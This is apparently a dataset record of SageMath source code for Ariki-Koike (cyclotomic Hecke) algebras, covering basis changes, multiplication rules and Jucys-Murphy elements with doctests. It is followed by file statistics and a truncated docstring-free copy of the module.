sage: TestSuite(T).run() # long time
"""
_Basis.__init__(self, algebra, prefix='T')
self._assign_names(['T%s'%i for i in range(self._n)])
def _repr_term(self, t):
r"""
Return a string representation of the basis element indexed by ``t``.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._repr_term( ((1,0,2), Permutation([3,2,1])) )
'T[0,2,1,0,0,2,1,2]'
"""
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return (self._print_options['prefix']
+ '[%s]'%','.join('%d'%i for i in redword))
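# A standalone sketch (plain Python, not from this module) of the same
# flattening: the tuple of T_0-powers and a reduced word for w become one
# word.  [2, 1, 2] below is the reduced word of the permutation [3,2,1]
# used in the doctest above.
def t_basis_word(powers, perm_word):
    word = []
    for i, k in enumerate(powers):
        if k:
            word += list(reversed(range(1, i + 1))) + [0] * k
    return word + list(perm_word)

assert t_basis_word((1, 0, 2), [2, 1, 2]) == [0, 2, 1, 0, 0, 2, 1, 2]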
def _latex_term(self, t):
r"""
Return a latex representation of the basis element indexed by ``t``.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._latex_term( ((1,0,2), Permutation([3,2,1])) )
'T_{0}T_{2}T_{1}T_{0}T_{0}T_{2}T_{1}T_{2}'
"""
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return ''.join("%s_{%d}"%(self._print_options['prefix'], i)
for i in redword)
def _from_LT_basis(self, m):
r"""
Return the image of the `LT` basis element indexed
by ``m`` in ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(4, 2)
sage: LT = H.LT()
sage: T = H.T()
sage: all(T(Li) == T.L(i+1) for i,Li in enumerate(LT.L()))
True
sage: all(T(Ti) == T.T(i) for i,Ti in enumerate(LT.T()))
True
Check that the products of elements agrees::
sage: type_A_words = [p.reduced_word() for p in Permutations(H._n)]
sage: def from_reduced_word(B, w):
....: t = B.T()
....: return B.prod(t[i] for i in w)
sage: all(T(from_reduced_word(LT, w)) == from_reduced_word(T, w)
....: for w in type_A_words)
True
Check that the composition of the morphisms is the identity::
sage: all(T(LT(b)) == b for b in T.basis()) # indirect doctest
True
"""
ret = self.prod(self.L(i+1)**k for i,k in enumerate(m[0]))
return ret * self.monomial( (self._zero_tuple, m[1]) )
@cached_method
def algebra_generators(self):
r"""
Return the algebra generators of ``self``.
EXAMPLES::
sage: T = algebras.ArikiKoike(5, 3).T()
sage: dict(T.algebra_generators())
{0: T[0], 1: T[1], 2: T[2]}
sage: T = algebras.ArikiKoike(1, 4).T()
sage: dict(T.algebra_generators())
{1: T[1], 2: T[2], 3: T[3]}
"""
start = 1 if self._r == 1 else 0
return Family(list(range(start, self._n)), self.T)
def T(self, i=None):
r"""
Return the generator(s) `T_i` of ``self``.
INPUT:
- ``i`` -- (default: ``None``) the generator `T_i` or if ``None``,
then the list of all generators `T_i`
EXAMPLES::
sage: T = algebras.ArikiKoike(8, 3).T()
sage: T.T(1)
T[1]
sage: T.T()
[T[0], T[1], T[2]]
sage: T = algebras.ArikiKoike(1, 4).T()
"""
if i is None:
return [self.T(j) for j in range(self._n)]
if i == 0:
return self.monomial( ((1,) + self._zero_tuple[1:], self._one_perm) )
s = self._Pn.simple_reflections()
return self.monomial( (self._zero_tuple, s[i]) )
@cached_method
def L(self, i=None):
r"""
Return the Jucys-Murphy element(s) `L_i`.
The Jucys-Murphy element `L_i` is defined as
.. MATH::
L_i = q^{-i+1} T_{i-1} \cdots T_1 T_0 T_1 \cdots T_{i-1}
= q^{-1} T_{i-1} L_{i-1} T_{i-1}.
INPUT:
- ``i`` -- (default: ``None``) the Jucys-Murphy element `L_i`
or if ``None``, then the list of all `L_i`
EXAMPLES::
sage: T = algebras.ArikiKoike(8, 3).T()
sage: T.L(2)
(q^-1)*T[1,0,1]
sage: T.L()
[T[0], (q^-1)*T[1,0,1], (q^-2)*T[2,1,0,1,2]]
sage: T0,T1,T2 = T.T()
sage: q = T.q()
sage: T.L(1) == T0
True
sage: T.L(2) == q^-1 * T1*T0*T1
True
sage: T.L(3) == q^-2 * T2*T1*T0*T1*T2
True
sage: T = algebras.ArikiKoike(1, 3).T()
sage: T.L(2)
u + (-u*q^-1+u)*T[1]
sage: T.L()
[u,
u + (-u*q^-1+u)*T[1],
u + (-u*q^-1+u)*T[2] + (-u*q^-2+u*q^-1)*T[2,1,2]]
TESTS:
Check that the Jucys-Murphy elements form a commutative
subring::
sage: T = algebras.ArikiKoike(8, 4).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
sage: T = algebras.ArikiKoike(2, 3).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
sage: T = algebras.ArikiKoike(1, 4).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
"""
if i is None:
return [self.L(j) for j in range(1, self._n+1)]
if i == 1:
if self._r == 1:
return self.from_base_ring(self._u[0])
else:
return self.T(0)
T = self.T()
return self._q**-1 * T[i-1] * self.L(i-1) * T[i-1]
@cached_method
def product_on_basis(self, m1, m2):
r"""
Return the product of the basis elements indexed
by ``m1`` and ``m2``.
EXAMPLES::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T0, T1, T2 = T.T()
sage: T.product_on_basis(T0.leading_support(), T1.leading_support())
T[0,1]
sage: T1 * T2
T[1,2]
sage: T2 * T1
T[2,1]
sage: T2 * (T2 * T1 * T0)
-(1-q)*T[2,1,0] + q*T[1,0]
sage: (T1 * T0 * T1 * T0) * T0
(-u0*u1)*T[1,0,1] + ((u0+u1))*T[0,1,0,1]
sage: (T0 * T1 * T0 * T1) * (T0 * T1)
(-u0*u1*q)*T[1,0] + (u0*u1-u0*u1*q)*T[1,0,1]
+ ((u0+u1)*q)*T[0,1,0] + ((-u0-u1)+(u0+u1)*q)*T[0,1,0,1]
sage: T1 * (T0 * T2 * T1 * T0)
T[1,0,2,1,0]
sage: (T1 * T2) * (T2 * T1 * T0)
-(1-q)*T[2,1,0,2] - (q-q^2)*T[1,0] + q^2*T[0]
sage: (T2*T1*T2) * (T2*T1*T0*T1*T2)
-(q-q^2)*T[2,1,0,1,2] + (1-2*q+q^2)*T[2,1,0,2,1,2]
- (q-q^2)*T[1,0,2,1,2] + q^2*T[0,2,1,2]
We check some relations::
sage: T0 * T1 * T0 * T1 == T1 * T0 * T1 * T0
True
sage: T1 * T2 * T1 == T2 * T1 * T2
True
sage: (T1 * T0) * T0 == T1 * (T0 * T0)
True
sage: (T.L(1) * T.L(2)) * T.L(2) - T.L(1) * (T.L(2) * T.L(2))
0
sage: (T.L(2) * T.L(3)) * T.L(3) - T.L(2) * (T.L(3) * T.L(3))
0
TESTS::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T0, T1, T2 = T.T()
sage: (T1 * T0 * T1) * (T0 * T0)
(-u0*u1)*T[1,0,1] + ((u0+u1))*T[0,1,0,1]
sage: T1 * T.L(3) * T2 * T1 * T0 - T1 * (T.L(3) * T2 * T1 * T0)
0
sage: T = algebras.ArikiKoike(3, 3).T()
sage: x = T.T(0) * T.T(1)
sage: (x*x)*x == x*(x*x)
True
sage: T = algebras.ArikiKoike(3, 4).T()
sage: L1 = T.L(1)
sage: L2 = T.L(2)
sage: (L2 * L1^2) * L2 == L2 * (L1^2 * L2)
True
sage: T1 = T.T(1)
sage: (T1 * L1^2) * T1 * L1 * L1 == (T1 * L1^2) * T1 * L1^2
True
"""
# We represent T_i for i > 0 as S_i in comments to avoid confusion.
# Product is of the form t1*s1 * t2*s2: separate the T's and permutations.
t1, s1 = m1
t2, s2 = m2
one = self.base_ring().one()
q = self._q
qm1 = q - one
# We first handle the case when s1 == 1
if s1 == self._one_perm:
if t1 == self._zero_tuple:
# Multiplying 1 * m2
return self._from_dict({m2: one}, remove_zeros=False)
if t2 == self._zero_tuple:
return self._from_dict({(t1, s2): one}, remove_zeros=False)
k1 = max(k for k,a in enumerate(t1) if a != 0)
k2 = min(k for k,a in enumerate(t2) if a != 0)
if k1 < k2:
T = list(t1)
for k in range(k2, len(t2)):
T[k] = t2[k]
return self._from_dict({(tuple(T), s2): one}, remove_zeros=False)
# This is the most recursive part of the product
M = self._product_TT(k1, t1[k1], k2, t2[k2])
t1 = list(t1)
t2 = list(t2)
t1[k1] = 0
t2[k2] = 0
L = self._from_dict({(tuple(t1), self._one_perm): one}, remove_zeros=False)
R = self._from_dict({(tuple(t2), s2): one}, remove_zeros=False)
return L * M * R
# The current product of T's and the type A Hecke algebra
tprod = [( [(k, a) for k, a in enumerate(t2) if a != 0], {s2: one} )]
# s1 through t2
for i in reversed(s1.reduced_word()):
new_t = []
for index in range(len(tprod)):
j = i
T, sprod = tprod[index]
absorbed = False
for ind in range(len(T)):
k, a = T[ind]
# -1 from i since k is 0-based but i is 1-based
if j < k:
j += 1
elif j == k:
absorbed = True
# Quadratic relation: S_k^2 = (q - 1) S_k + q
# So S_{k-1} T_{k,a} = (q-1) T_{k,a} + q T_{k-1,a}
# Make a copy of T since we need to mutate it
new_t.append((list(T), {s: q * sprod[s] for s in sprod}))
new_t[-1][0][ind] = (k-1, a)
for s in sprod:
sprod[s] *= qm1
break
elif j == k + 1:
absorbed = True
T[ind] = (k+1, a)
break
# elif j > k: pass
if absorbed:
# We do not need to update tprod[index] because we
# have mutated that pair of objects (T, sprod).
continue
# Do the usual Hecke product of S_j * S
temp = {} # start from 0
for p in sprod:
c = sprod[p]
# We have to flip the side due to Sage's
# convention for multiplying permutations
pj = p.apply_simple_reflection(j, side="left")
if p.has_descent(j, side="left"):
iaxpy(1, {p: c * qm1, pj: c * self._q}, temp)
else:
iaxpy(1, {pj: c}, temp)
tprod[index] = (T, temp)
tprod.extend(new_t)
# Compute t1 * T * sprod
def compute(T, sprod):
if not T: # T=1, so just do t1 * sprod, each of which is in order
return self._from_dict({(t1, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
s_elt = self._from_dict({(self._zero_tuple, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
# Break T into basis vectors as much as possible to best take
# advantage of the caching
cur = list(t1)
product = [cur]
if t1 != self._zero_tuple:
K = max(k for k, a in enumerate(t1) if a != 0)
else:
K = -1
T.reverse() # reverse the list so we can pop off the front
while T:
k, a = T.pop()
if k > K:
cur[k] = a
else:
cur = list(self._zero_tuple)
cur[k] = a
product.append(cur)
K = k
return self.prod(self._from_dict({(tuple(p), self._one_perm): one},
remove_zeros=False, coerce=False)
for p in product) * s_elt
return self.sum(compute(T, sprod) for T, sprod in tprod)
@lazy_attribute
def _T0_polynomial(self):
r"""
Return `p` such that `T_0^r - p = \prod_{i=0}^{r-1} (T_0 - u_i)`.
OUTPUT:
A ``dict`` representing the polynomial `p`.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 2).T()
sage: T._T0_polynomial
((u0 + u1 + u2 + u3))*DUMMY^3
+ ((-u0*u1 - u0*u2 - u1*u2 - u0*u3 - u1*u3 - u2*u3))*DUMMY^2
+ ((u0*u1*u2 + u0*u1*u3 + u0*u2*u3 + u1*u2*u3))*DUMMY
- u0*u1*u2*u3
"""
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
# Remove the highest power
return -prod(z - val for val in self._u).truncate(self._r)
def _reduced_T0_power(self, exp):
r"""
Return the element `T_0` to the power ``exp`` in terms
of `T_0^k` for `k < r`.
EXAMPLES::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T._reduced_T0_power(1)
1
sage: T._reduced_T0_power(2)
((u0 + u1))*DUMMY - u0*u1
sage: T._reduced_T0_power(3)
((u0^2 + u0*u1 + u1^2))*DUMMY + (-u0^2*u1 - u0*u1^2)
sage: T._reduced_T0_power(4)
((u0^3 + u0^2*u1 + u0*u1^2 + u1^3))*DUMMY
+ (-u0^3*u1 - u0^2*u1^2 - u0*u1^3)
sage: T._reduced_T0_power(5)
((u0^4 + u0^3*u1 + u0^2*u1^2 + u0*u1^3 + u1^4))*DUMMY
+ (-u0^4*u1 - u0^3*u1^2 - u0^2*u1^3 - u0*u1^4)
"""
if exp < self._r:
return self.base_ring().one()
PR = self._T0_polynomial.parent()
z = PR.gen()
cur = z ** exp
while cur.degree() >= self._r:
cur = (PR.sum(coeff * self._T0_polynomial * z**e
for e, coeff in enumerate(cur.list()[self._r:]))
+ cur.truncate(self._r))
return cur
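# A standalone sketch (not from this module; assumes SymPy) of the same
# reduction: take z**exp modulo the monic polynomial prod(z - u_i).  Here
# r = 2 with roots u0, u1, reproducing _reduced_T0_power(3) above.
import sympy
z, u0, u1 = sympy.symbols('z u0 u1')
charpoly = sympy.expand((z - u0) * (z - u1))
reduced = sympy.rem(z**3, charpoly, z)
# reduced == (u0**2 + u0*u1 + u1**2)*z - u0**2*u1 - u0*u1**2, which is the
# doctest output with DUMMY in place of z.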
@cached_method
def _product_TT(self, kp, a, k, b):
r"""
Return the product `T_{k',a} T_{k,b}` with `k' \geq k` in terms
of the basis elements of ``self``.
From Lemma 2.3 of [BM1997]_, we have
.. MATH::
T_{k',a} T_{k,b} = T_{k-1,b} T_{k',a} T_1
+ (q - 1) \sum_{i=1}^{b} \left( T_{k-1,a+b-i} T_{k',i}
- T_{k-1,i} T_{k',a+b-i} \right).
INPUT:
- ``kp``, ``k`` -- 0-based indices
- ``a``, ``b`` -- the exponents of the `T_0` generator
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._product_TT(1, 0, 0, 1)
T[1,0]
sage: T._product_TT(1, 1, 0, 1)
T[1,0,0]
sage: T._product_TT(1, 2, 0, 1)
T[1,0,0,0]
sage: T._product_TT(1, 3, 0, 1)
(-u0*u1*u2*u3)*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[1,0,0]
+ ((u0+u1+u2+u3))*T[1,0,0,0]
sage: T._product_TT(1, 2, 0, 2)
(-u0*u1*u2*u3)*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[1,0,0]
+ ((u0+u1+u2+u3))*T[1,0,0,0]
sage: T._product_TT(2, 1, 0, 3)
(-u0*u1*u2*u3)*T[2,1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[2,1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[2,1,0,0]
+ ((u0+u1+u2+u3))*T[2,1,0,0,0]
TESTS::
sage: H = algebras.ArikiKoike(3, 4)
sage: T = H.T()
sage: T._product_TT(1, 2, 1, 2)
(-u0*u1*u2+u0*u1*u2*q)*T[1,0]
+ (u0*u1*u2-u0*u1*u2*q)*T[0,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[0,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[0,0,1,0]
+ T[0,0,1,0,0,1]
sage: T._product_TT(2,2,2,2)
(-u0*u1*u2+u0*u1*u2*q)*T[2,1,0,2]
+ (u0*u1*u2-u0*u1*u2*q)*T[1,0,2,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[1,0,2,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[1,0,0,2,1,0]
+ T[1,0,0,2,1,0,0,1]
sage: T._product_TT(3,2,3,2)
(-u0*u1*u2+u0*u1*u2*q)*T[3,2,1,0,3,2]
+ (u0*u1*u2-u0*u1*u2*q)*T[2,1,0,3,2,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[2,1,0,3,2,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[2,1,0,0,3,2,1,0]
+ T[2,1,0,0,3,2,1,0,0,1]
"""
# Quadratic relation: S_i^2 - (q - 1) S_i - q == 0
# [BM1997]_: S_i^2 - (q_1 + q_2) S_i + q_1 q_2 == 0
# Implies q_1 = q, q_2 = -1
one = self.base_ring().one()
# Case T_{k',a} T_0^b = T_{k',a+b}
if k == 0:
if a + b < self._r:
T = list(self._zero_tuple)
T[kp] = a + b
return self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
def key(exp):
if exp > 0 or kp == 0:
T = list(self._zero_tuple)
T[kp] = exp
return (tuple(T), self._one_perm)
# Note that kp is 0-based, but our 0-index in the T portion
# is the power of T_0
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
return (self._zero_tuple, perm)
p = self._reduced_T0_power(a + b)
zero = self.base_ring().zero()
return self._from_dict({key(exp): coeff
for exp, coeff in enumerate(p)
if coeff != zero},
remove_zeros=False, coerce=False)
# Otherwise k > 0
assert kp >= k
s1 = self._Pn.simple_reflection(1)
qm1 = self._q - one
T = list(self._zero_tuple)
T[k-1] = b
T[kp] = a
ret = {(tuple(T), s1): one}
zero = self.base_ring().zero()
def T_index(exp, ind, i, indp):
T = list(self._zero_tuple)
T[ind] = exp
T[indp] = i
return tuple(T)
for i in range(1, b+1):
if a + b - i == i:
continue
if a + b - i < self._r:
T[k-1] = a + b - i
T[kp] = i
m = (tuple(T), self._one_perm)
T[k-1] = i
T[kp] = a + b - i
mp = (tuple(T), self._one_perm)
iaxpy(1, {m: qm1, mp: -qm1}, ret)
else:
p = self._reduced_T0_power(a + b - i)
temp = {(T_index(exp, k-1, i, kp), self._one_perm): qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero and k > 1:
# We need to add back in the permutation for the "T_{k-1,0}"
# in the reduction from T_{k-1,a+b-i}
perm = self._Pn.one()
for j in range(2, k+1): # Recall k is 0-based, we add 1 back from Lemma 2.3(a)
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, k-1, i, kp)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
temp = {(T_index(exp, kp, i, k-1), self._one_perm): -qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero:
# We need to add back in the permutation for the "T_{k',0}"
# in the reduction from T_{k',a+b-i}
perm = self._Pn.one()
for j in range(1, kp+1): # Recall kp is 0-based
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, kp, i, k-1)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
return self._from_dict(ret, remove_zeros=False)
| 38.876914
| 115
| 0.442048
|
from sage.misc.cachefunc import cached_method
from sage.misc.lazy_attribute import lazy_attribute
from sage.misc.misc_c import prod
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.algebras import Algebras
from sage.categories.rings import Rings
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.categories.cartesian_product import cartesian_product
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.polynomial.laurent_polynomial_ring import LaurentPolynomialRing
from sage.rings.integer_ring import ZZ
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.permutation import Permutations
from sage.sets.family import Family
from sage.data_structures.blas_dict import iaxpy
class _Basis(CombinatorialFreeModule, BindableClass):
def __init__(self, algebra, prefix='AK'):
self._r = algebra._r
self._n = algebra._n
self._q = algebra._q
self._u = algebra._u
self._zero_tuple = tuple([0] * self._n)
self._Pn = Permutations(self._n)
self._one_perm = self._Pn.one()
C = cartesian_product([range(self._r)] * self._n)
indices = cartesian_product([C, self._Pn])
CombinatorialFreeModule.__init__(self, algebra.base_ring(), indices,
prefix=prefix,
category=algebra._BasesCategory())
@cached_method
def one_basis(self):
return (self._zero_tuple, self._one_perm)
class ArikiKoikeAlgebra(Parent, UniqueRepresentation):
@staticmethod
def __classcall_private__(cls, r, n, q=None, u=None, R=None):
if u is None:
if q is not None:
R = q.parent()
if R is None:
R = PolynomialRing(ZZ, 'u', r)
u = R.gens()
if q is None:
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
u = PolynomialRing(ZZ, 'u', r).gens()
if q is None:
q = 'q'
else:
if not isinstance(u, (list,tuple)):
u = [u]*r
if R is None:
from sage.structure.element import get_coercion_model
cm = get_coercion_model()
if q is None:
R = cm.common_parent(*[val.parent() for val in u])
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
R = cm.common_parent(q.parent(), *[val.parent() for val in u])
elif q is None:
q = 'q'
u = [R(val) for val in u]
if R not in Rings().Commutative():
raise TypeError("base ring must be a commutative ring")
q = R(q)
u = tuple(u)
return super(ArikiKoikeAlgebra, cls).__classcall__(cls, r, n, q, u, R)
def __init__(self, r, n, q, u, R):
self._r = r
self._n = n
self._q = q
self._u = u
self._category = Algebras(R).FiniteDimensional().WithBasis()
Parent.__init__(self, base=R, category=self._category.WithRealizations())
T = self.T()
LT = self.LT()
T.module_morphism(LT._from_T_basis, codomain=LT).register_as_coercion()
LT.module_morphism(T._from_LT_basis, codomain=T).register_as_coercion()
def _repr_(self):
return "Ariki-Koike algebra of rank {} and order {} with q={} and u={} over {}".format(
self._r, self._n, self._q, self._u, self.base_ring())
def _latex_(self):
return "\\mathcal{H}_{%s,%s}(%s)"%(self._r, self._n, self._q)
def hecke_parameter(self):
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
return self._u
u = cyclotomic_parameters
def a_realization(self):
return self.LT()
class _BasesCategory(Category_realization_of_parent):
def __init__(self, base):
Category_realization_of_parent.__init__(self, base)
def super_categories(self):
return [Realizations(self.base()), self.base()._category]
def _repr_(self):
return "Category of bases of %s" % self.base()
class ParentMethods:
def _repr_(self):
return "%s in the %s-basis"%(self.realization_of(), self._realization_name())
def hecke_parameter(self):
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
return self._u
u = cyclotomic_parameters
@cached_method
def gens(self):
return tuple(self.algebra_generators())
def dimension(self):
from sage.arith.all import factorial
return self._r**self._n * factorial(self._n)
def some_elements(self):
G = self.algebra_generators()
elts = [self.an_element()] + list(G)
elts += [self.L(1)**2]
if self._n > 1:
elts += [self.L(2)**(self._r//2)]
return elts
class LT(_Basis):
def __init__(self, algebra):
_Basis.__init__(self, algebra, prefix='LT')
self._assign_names(self.algebra_generators().keys())
def _repr_term(self, m):
gen_str = lambda e: '' if e == 1 else '^%s'%e
lhs = '*'.join('L%s'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
rhs = 'T[{}]'.format(','.join(str(i) for i in redword))
if not lhs:
return rhs
return lhs + '*' + rhs
def _latex_term(self, m):
gen_str = lambda e: '' if e == 1 else '^{%s}'%e
lhs = ' '.join('L_{%s}'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
return lhs + ' ' + ' '.join("T_{%d}"%i for i in redword)
def _from_T_basis(self, t):
ret = self.one()
T = list(self._zero_tuple)
one = self.base_ring().one()
for i,k in enumerate(t[0]):
if k == 0:
continue
perm = self._Pn.prod(self._Pn.simple_reflection(j)
for j in range(1,i+1))
ret = ret * self._from_dict({(self._zero_tuple, perm): one},
remove_zeros=False, coerce=False)
T[0] = k
ret = ret * self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
return ret * self._from_dict({(self._zero_tuple, t[1]): one},
remove_zeros=False, coerce=False)
@cached_method
def algebra_generators(self):
d = {}
if self._r != 1:
for i in range(self._n):
r = list(self._zero_tuple)
r[i] = 1
d['L%s'%(i+1)] = self.monomial( (tuple(r), self._one_perm) )
G = self._Pn.group_generators()
for i in range(1, self._n):
d['T%s'%i] = self.monomial( (self._zero_tuple, G[i]) )
return Family(sorted(d), lambda i: d[i])
def T(self, i=None):
G = self.algebra_generators()
if i is None:
return [G['L1']] + [G['T%s'%j] for j in range(1, self._n)]
if i == 0:
return G['L1']
return G['T%s'%i]
def L(self, i=None):
G = self.algebra_generators()
if i is None:
if self._r == 1:
return [self._Li_power(j, 1) for j in range(1, self._n+1)]
return [G['L%s'%j] for j in range(1, self._n+1)]
if self._r == 1:
return self._Li_power(i, 1)
return G['L%s'%i]
@cached_method
def product_on_basis(self, m1, m2):
L1,T1 = m1
L2,T2 = m2
if sum(L2) == 0:
# Compute and return the product of T1 and T2, whilst fixing L
return self._from_dict(self._product_LTwTv(L1, T1, T2),
remove_zeros=False, coerce=False)
# If T1 is trivial then we just have L1*L2*T2, so we only need to rewrite
# all of the "large" powers that appear in L1*L2. Unfortunately, this
# will almost certainly introduce more T_w's and it will be recursive
if T1 == self._one_perm:
Lbig = list(self._zero_tuple)
Lsmall = list(self._zero_tuple)
for i in range(self._n):
s = L1[i] + L2[i]
if s < self._r:
Lsmall[i] = s
else:
Lbig[i] = s
if tuple(Lbig) == self._zero_tuple:
# if no big powers we only need to combine Lsmall and T2
return self.monomial((tuple(Lsmall), T2))
# The l variables all commute, so we can multiply them in any order
# that we like. For improved efficiency, however, we move the Ls to
# the left as soon as we can. We also multiply the "big" powers
# in the order L_n^N L_{n-1}^N...L_1^N as this way we have to
# expand fewer powers of the L_k's later.
return (self.monomial((tuple(Lsmall), self._one_perm))
* prod(self._Li_power(i+1, Lbig[i])
for i in reversed(range(self._n)) if Lbig[i] > 0)
* self.monomial((self._zero_tuple, T2))
)
return ( self.monomial((L1, self._one_perm))
* self._product_Tw_L(T1, L2)
* self.monomial((self._zero_tuple, T2)) )
def _product_LTwTv(self, L, w, v):
ret = {v: self.base_ring().one()}
qm1 = self._q - self.base_ring().one()
for i in reversed(w.reduced_word()):
temp = {}
for p in ret:
c = ret[p]
# We have to flip the side due to Sage's convention for multiplying permutations
pi = p.apply_simple_reflection(i, side="left")
if p.has_descent(i, side="left"):
iaxpy(1, {p: c * qm1, pi: c * self._q}, temp)
else:
iaxpy(1, {pi: c}, temp)
ret = temp
return {(L, p): ret[p] for p in ret}
def _product_Tw_L(self, w, L):
# initialize wL to L: this is what we will eventually return
wL = {(L, self._one_perm): self.base_ring().one()}
q = self._q
one = q.parent().one()
for i in w.reduced_word()[::-1]:
iL = {} # this will become T_i * L, written in standard form
for lv in wL:
c = wL[lv]
L = list(lv[0]) # make a copy
v = lv[1]
a, b = L[i-1], L[i]
L[i-1], L[i] = L[i], L[i-1] # swap L_i=L[i-1] and L_{i+1}=L[i]
# the term L_1^{a_1} ... L_i^{a_{i+1}} L_{i+1}^{a_i} ... L_n^{a_n} T_i T_v
# always appears
iaxpy(c, self._product_LTwTv(tuple(L), self._Pn.simple_reflections()[i], v), iL) # need T_i*T_v
if a < b:
Ls = [ list(L) for k in range(b-a) ] # make copies of L
for k in range(b-a):
Ls[k][i-1] = a + k
Ls[k][i] = b - k
c *= (q - one)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
elif a > b:
Ls = [ list(L) for k in range(a-b) ] # make copies of L
for k in range(a-b):
Ls[k][i-1] = b + k
Ls[k][i] = a - k
c *= (one - q)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
wL = iL # replace wL with iL and repeat
return self._from_dict(wL, remove_zeros=False, coerce=False)
@cached_method
def _Li_power(self, i, m):
# shorthand for returning a tuple of the form (0,...,a,b,...,0) with a,b
# in the (i-1)th and i-th positions, respectively
def Ltuple(a, b):
return tuple([b if j == i else a if j == i-1 else 0
for j in range(1,self._n+1)])
# return "small" powers of the generators without change
if m < self._r:
return self.monomial( (Ltuple(0, m), self._one_perm) )
if i > 1:
si = self._Pn.simple_reflections()[i-1]
qsum = self.base_ring().one() - self._q**-1
# by calling _Li_power we avoid infinite recursion here
return ( self.sum_of_terms( ((Ltuple(c, m-c), si), qsum) for c in range(1, m) )
+ self._q**-1 * self.T(i-1) * self._Li_power(i-1, m) * self.T(i-1) )
# now left with the case i = 1 and m >= r
if m > self._r:
return self.monomial((Ltuple(0, 1), self._one_perm)) * self._Li_power(i,m-1)
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
p = list(prod(z - val for val in self._u))
p.pop() # remove the highest power
zero = self.base_ring().zero()
return self._from_dict({(Ltuple(0, exp), self._one_perm): -coeff
for exp,coeff in enumerate(p) if coeff != zero},
remove_zeros=False, coerce=False)
@cached_method
def inverse_T(self, i):
c = ~self._q - self.base_ring().one()
m = self.T(i).leading_support()
return self._from_dict({m: ~self._q, self.one_basis(): c})
class Element(CombinatorialFreeModule.Element):
def inverse(self):
if len(self) != 1:
raise NotImplementedError("inverse only implemented for monomials")
l,w = self.support_of_term()
if sum(l) != 0:
raise NotImplementedError("inverse only implemented for monomials in T variables")
H = self.parent()
return ~self[l,w] * H.prod(H.inverse_T(i) for i in reversed(w.reduced_word()))
__invert__ = inverse
class T(_Basis):
def __init__(self, algebra):
_Basis.__init__(self, algebra, prefix='T')
self._assign_names(['T%s'%i for i in range(self._n)])
def _repr_term(self, t):
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return (self._print_options['prefix']
+ '[%s]'%','.join('%d'%i for i in redword))
def _latex_term(self, t):
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return ''.join("%s_{%d}"%(self._print_options['prefix'], i)
for i in redword)
def _from_LT_basis(self, m):
ret = self.prod(self.L(i+1)**k for i,k in enumerate(m[0]))
